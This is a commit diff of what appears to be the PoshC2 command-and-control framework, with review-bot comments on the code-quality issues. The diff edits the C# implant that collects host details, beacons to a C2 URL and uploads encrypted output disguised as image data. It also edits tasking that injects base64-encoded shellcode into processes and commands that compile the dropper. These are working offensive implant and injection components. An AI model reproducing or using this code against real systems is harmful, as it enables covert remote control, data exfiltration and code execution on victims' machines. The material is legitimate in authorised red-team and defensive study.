Use pyreadline for Windows compatibility and when injecting shellcode log filename
parent
ae3c5ed3cf
commit
0aaa5ce53c
13
Config.py
13
Config.py
|
@ -1,4 +1,5 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
import os
|
||||||
from UrlConfig import UrlConfig
|
from UrlConfig import UrlConfig
|
||||||
|
|
||||||
HOST_NAME = '0.0.0.0'
|
HOST_NAME = '0.0.0.0'
|
||||||
|
@ -56,12 +57,12 @@ ServerHeader = "Apache"
|
||||||
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
|
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
|
||||||
|
|
||||||
# DO NOT CHANGE #
|
# DO NOT CHANGE #
|
||||||
FilesDirectory = "%sFiles/" % POSHDIR
|
FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
|
||||||
PayloadsDirectory = "%spayloads/" % ROOTDIR
|
PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
|
||||||
ModulesDirectory = "%sModules/" % POSHDIR
|
ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
|
||||||
DownloadsDirectory = "%sdownloads/" % ROOTDIR
|
DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
|
||||||
ReportsDirectory = "%sreports/" % ROOTDIR
|
ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
|
||||||
Database = "%s/PowershellC2.SQLite" % ROOTDIR
|
Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
|
||||||
|
|
||||||
# DO NOT CHANGE #
|
# DO NOT CHANGE #
|
||||||
# These rules aren't needed as you'll find them auto-generated within the project folder now.
|
# These rules aren't needed as you'll find them auto-generated within the project folder now.
|
||||||
|
|
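Review bot: The rewritten directory constants still rely on POSHDIR and ROOTDIR ending in a path separator (`"%spayloads%s" % (ROOTDIR, os.sep)`), while the `Database` line inserts `os.sep` itself, so two conventions now sit side by side. Building these with `os.path.join(ROOTDIR, "payloads", "")` and `os.path.join(ROOTDIR, "PowershellC2.SQLite")` would not depend on how ROOTDIR is terminated. The migrate hunk in PSHandler.py in this same commit still hard-codes `"%spayloads/..."`, so the separator change is only partly applied. ROOTDIR and POSHDIR are defined outside this hunk, so their exact form should be confirmed.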
4
Core.py
4
Core.py
|
@ -1,9 +1,9 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
|
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
|
||||||
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
|
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
|
||||||
from Utils import randomuri
|
from Utils import randomuri
|
||||||
from TabComplete import readline, tabCompleter
|
from TabComplete import tabCompleter
|
||||||
from Help import COMMANDS
|
from Help import COMMANDS
|
||||||
|
|
||||||
def default_response():
|
def default_response():
|
||||||
|
|
|
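Review bot: The new `import ..., readline, pyreadline.rlmain` line is unconditional, but pyreadline is a Windows readline implementation, so this import will most likely fail on Linux or macOS hosts, which the `mono-csc` branch in Payloads shows are still supported. The same import is added in the hunk starting `@ -1,6 +1,6 @@` with `import sys, re, os, time, subprocess`, in PSHandler.py, and in the TabComplete hunk. Guarding it with `if os.name == 'nt': import pyreadline.rlmain` keeps the Windows fix without affecting other platforms. The requirements entry could likewise be `pyreadline; sys_platform == "win32"`. No name from `pyreadline.rlmain` is used in the visible lines, so a short comment saying why the import is needed would help.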
@ -77,7 +77,7 @@ public class Program
|
||||||
x.Headers.Add("Referrer", "#REPLACEREFERER#");
|
x.Headers.Add("Referrer", "#REPLACEREFERER#");
|
||||||
|
|
||||||
if (null != cookie)
|
if (null != cookie)
|
||||||
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
|
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
|
||||||
|
|
||||||
return x;
|
return x;
|
||||||
}
|
}
|
||||||
|
@ -188,7 +188,7 @@ public class Program
|
||||||
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
||||||
int pid = Process.GetCurrentProcess().Id;
|
int pid = Process.GetCurrentProcess().Id;
|
||||||
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
||||||
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
|
var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
|
||||||
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
|
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
|
||||||
|
|
||||||
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
|
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
|
||||||
|
@ -331,7 +331,7 @@ public class Program
|
||||||
internal static String GenerateUrl()
|
internal static String GenerateUrl()
|
||||||
{
|
{
|
||||||
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
|
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
|
||||||
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
|
return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -502,7 +502,7 @@ public class Program
|
||||||
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
|
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
output.AppendLine($@"[X] Invalid time ""{c}""");
|
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
|
||||||
}
|
}
|
||||||
|
|
||||||
output.AppendLine(strOutput.ToString());
|
output.AppendLine(strOutput.ToString());
|
||||||
|
@ -519,7 +519,7 @@ public class Program
|
||||||
catch (Exception e)
|
catch (Exception e)
|
||||||
{
|
{
|
||||||
var task = Encryption(Key, "Error");
|
var task = Encryption(Key, "Error");
|
||||||
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
|
var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
|
||||||
var outputBytes = System.Convert.FromBase64String(eroutput);
|
var outputBytes = System.Convert.FromBase64String(eroutput);
|
||||||
var sendBytes = ImgGen.GetImgData(outputBytes);
|
var sendBytes = ImgGen.GetImgData(outputBytes);
|
||||||
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
|
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import sys, re, os, readline, time, subprocess, traceback, signal, argparse
|
import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
|
||||||
from sqlite3 import Error
|
from sqlite3 import Error
|
||||||
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
|
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
|
||||||
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
|
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
|
||||||
|
|
17
PSHandler.py
17
PSHandler.py
|
@ -1,4 +1,4 @@
|
||||||
import base64, re, traceback, os, sys
|
import base64, re, traceback, os, sys, readline, pyreadline.rlmain
|
||||||
from Alias import ps_alias
|
from Alias import ps_alias
|
||||||
from Colours import Colours
|
from Colours import Colours
|
||||||
from Utils import randomuri, validate_sleep_time
|
from Utils import randomuri, validate_sleep_time
|
||||||
|
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
|
||||||
from Opsec import ps_opsec
|
from Opsec import ps_opsec
|
||||||
from Payloads import Payloads
|
from Payloads import Payloads
|
||||||
from Utils import argp, load_file, gen_key
|
from Utils import argp, load_file, gen_key
|
||||||
from TabComplete import readline, tabCompleter
|
from TabComplete import tabCompleter
|
||||||
|
|
||||||
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
|
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
|
||||||
try:
|
try:
|
||||||
|
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
arch = "64"
|
arch = "64"
|
||||||
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
|
||||||
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
|
||||||
arch = "86"
|
arch = "86"
|
||||||
|
|
||||||
if implant_comms == "Normal":
|
if implant_comms == "Normal":
|
||||||
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
|
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
elif implant_comms == "Daisy":
|
elif implant_comms == "Daisy":
|
||||||
daisyname = raw_input("Name required: ")
|
daisyname = raw_input("Name required: ")
|
||||||
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
|
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
elif implant_comms == "Proxy":
|
elif implant_comms == "Proxy":
|
||||||
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
|
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
|
||||||
|
shellcodefile = load_file(path)
|
||||||
|
|
||||||
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
||||||
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
|
||||||
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
|
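Review bot: In the `migrate` hunk the result of `load_file(path)` is passed straight to `base64.b64encode` with no None check, unlike the `@ -406` hunk above, which guards with `if shellcodefile != None:`. If `load_file` returns None for a missing file, as that guard suggests, the Daisy branch fails with a TypeError instead of a clear message, and its filename comes from `raw_input`. `path` and `shellcodefile` are also unbound when `implant_comms` matches none of the three branches, so the new `os.path.basename(path)` raises NameError in that case. A guard such as `if shellcodefile is None: print ("Error loading file: %s" % path); return` before `check_module_loaded` would cover the first case. `migrate` starts and ends outside this hunk, so an earlier check may already exist.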
@ -190,7 +190,8 @@ class Payloads(object):
|
||||||
output_file.write(cs9)
|
output_file.write(cs9)
|
||||||
output_file.close()
|
output_file.close()
|
||||||
if os.name == 'nt':
|
if os.name == 'nt':
|
||||||
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
|
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
|
||||||
|
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
|
||||||
else:
|
else:
|
||||||
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
||||||
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
|
||||||
|
|
|
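Review bot: Both csc.exe command strings in the `os.name == 'nt'` branch interpolate `self.BaseDirectory` and `name` unquoted, so a base directory containing a space splits the `-out:` and source arguments. How the string is executed is outside this hunk; if it goes through a shell, `name` is also interpreted by that shell on the operator's own host. Passing an argument list to `subprocess` avoids both problems, and quoting is the minimum: `-out:"%s%sdropper_cs.dll" "%s%sdropper.cs"`. The local name `compile` also shadows the builtin; `compiledll` would match `compileexe`.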
@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
|
||||||
try:
|
try:
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
import os, sys, readline, glob
|
import os, sys, readline, pyreadline.rlmain, glob
|
||||||
|
|
||||||
class tabCompleter(object):
|
class tabCompleter(object):
|
||||||
"""
|
"""
|
||||||
|
|
9
Tasks.py
9
Tasks.py
|
@ -19,12 +19,9 @@ def newTask(path):
|
||||||
user_command = command
|
user_command = command
|
||||||
hostinfo = DB.get_hostinfo(RandomURI)
|
hostinfo = DB.get_hostinfo(RandomURI)
|
||||||
now = datetime.datetime.now()
|
now = datetime.datetime.now()
|
||||||
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
|
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
|
||||||
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) :
|
command = command[:command.index("#")]
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
|
||||||
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
|
|
||||||
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
|
|
||||||
elif (command.lower().startswith('upload-file')):
|
elif (command.lower().startswith('upload-file')):
|
||||||
filepath = command.replace('upload-file', '')
|
filepath = command.replace('upload-file', '')
|
||||||
if ";" in filepath:
|
if ";" in filepath:
|
||||||
|
|
|
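Review bot: `command.index("#")` raises ValueError when a shellcode task has no `#` marker, for example one queued before this change or built by a code path that does not append the filename. It also splits at the first `#`, and the sharp handler formats the task as `"... %s%s #%s"` with `params` before the marker, so a `#` inside `params` would cut the command short and put the rest in the log. Checking `if "#" in command:` first, and keeping the old truncated form otherwise, removes the crash. Passing the filename to the logger as a separate value instead of in-band in the command string would remove the ambiguity. `newTask` starts and ends outside this hunk, so it is not visible here whether an outer handler catches the exception.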
@ -14,6 +14,8 @@ Add a configurable jitter to all implants
|
||||||
Update the notifications config if it is changed in the Config.py
|
Update the notifications config if it is changed in the Config.py
|
||||||
Add NotificationsProjectName in Config.py which is displayed in notifications message
|
Add NotificationsProjectName in Config.py which is displayed in notifications message
|
||||||
Add fpc script which searches the Posh DB for a particular command
|
Add fpc script which searches the Posh DB for a particular command
|
||||||
|
Use pyreadline for Windows compatibility
|
||||||
|
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
|
||||||
|
|
||||||
4.8 (13/02/19)
|
4.8 (13/02/19)
|
||||||
==============
|
==============
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
pyopenssl
|
pyopenssl
|
||||||
pandas
|
pandas
|
||||||
pyttsx3
|
pyttsx3
|
||||||
pycrypto
|
pycrypto
|
||||||
|
pyreadline
|